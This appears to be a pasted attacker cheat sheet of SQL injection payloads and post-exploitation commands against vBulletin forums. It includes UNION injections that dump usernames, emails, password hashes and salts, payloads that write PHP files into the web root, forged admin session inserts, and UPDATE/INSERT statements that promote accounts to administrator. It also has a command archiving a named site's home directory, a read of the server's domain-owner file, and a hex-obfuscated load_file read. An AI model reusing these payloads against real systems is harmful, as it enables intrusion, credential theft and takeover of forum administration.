vbb

1. bb_password
2. bb_userid
3. bb_cpsession
4. bb_sessionhash
5.  
6. validator.php
7. bigdump.php
8. mysqldumper
9.  
10. //Search config
11. CWD
12. class_core.php
13.  
14. select "<? phpinfo(); ?>" INTO OUTFILE 'C:/xampp/htdocs/info.php'
15. select 1,2,3,4,5,6,'<? phpinfo(); ?>',8 into dumpfile 'C:/xampp/htdocs/info.php'
16. AND 1=0; INSERT INTO Users (user,pass,half) VALUES ('x','y','z');
17.  
18. //Qerry SQL Inject Upload
19. &cat[0]=1) UNION select '<? phpinfo(); ?>' into dumpfile 'C:/xampp/htdocs/info.php'#
20. &messagegroupid[0]=2 ) UNION select '<? phpinfo(); ?>' into dumpfile 'C:/xampp/htdocs/info.php'#
21.  
22. //INSERT
23. INSERT INTO `cpsession` (`userid`, `hash`, `dateline`) VALUES (1, '123', 1312097397);
24. INSERT INTO `forum`.`cpsession` ( `userid` ,`hash` ,`dateline` ) VALUES ('1', '123', '12121');
25.  
26. // SQLI VBB GET USER NAME AND PASSWORD
27. &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
28. &messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
29.  
30. // AdminCp Section
31. &messagegroupid[0]=3 ) UNION SELECT concat(userid,0x3a,hash,0x3a,dateline) FROM cpsession#
32.  
33. // Update
34. UPDATE user SET username = 'KelvinX', password = '6f3d089f6315c64e3e28896dd2371c29', salt = '.Ah', email = '[email protected]', usergroupid = '6', membergroupids = '2', displaygroupid = '2', homepage = 'http://kelvinx.net', yahoo = 'tearsto_tiara', ipaddress = '127.0.0.1' WHERE userid = 22 ;
35. INSERT INTO administrator (userid, adminpermissions, navprefs, cssprefs, notes, dismissednews, languageid) VALUES (22, 491516, NULL, 'vBulletin_3_Manual', NULL, NULL, 0);
36.  
37.  
38.  
39. UPDATE user SET username = 'parkdream1', password = ' 622f1b7e97d9e1eb2cc099aa1b08bf13', salt = 'Bd]', email = '[email protected]', usergroupid = '6', membergroupids = '2', displaygroupid = '2', homepage = 'google.com.vn', yahoo = 'park.dre4m', ipaddress = '127.0.0.1' WHERE userid = 22 ;
40. INSERT INTO administrator (userid, adminpermissions, navprefs, cssprefs, notes, dismissednews, languageid) VALUES (22, 491516, NULL, 'vBulletin_3_Manual', NULL, NULL, 0);
41.  
42.  
43. tar -czf danchoitravinh.net.tar.gz /home/danchoitravinh.net/
44.  
45. select * from user where userid='264'
46.  
47. update user set usergroupid='6' where userid='264'
48.  
49. update user set email='[email protected]' where username='ch3coohminh'
50.  
51. cat /etc/virtual/domainowners
52.  
53.  
54.  
55. (((select/**/concat(0x3a2347693321,(unhex(hex(load_file(0x443a2f7777772f78616d70702f6874646f63732f466f72756d2f76622f63616368652f6f627365727665722f706167652e706870)))),0x3a2347693321))))
56.  
57.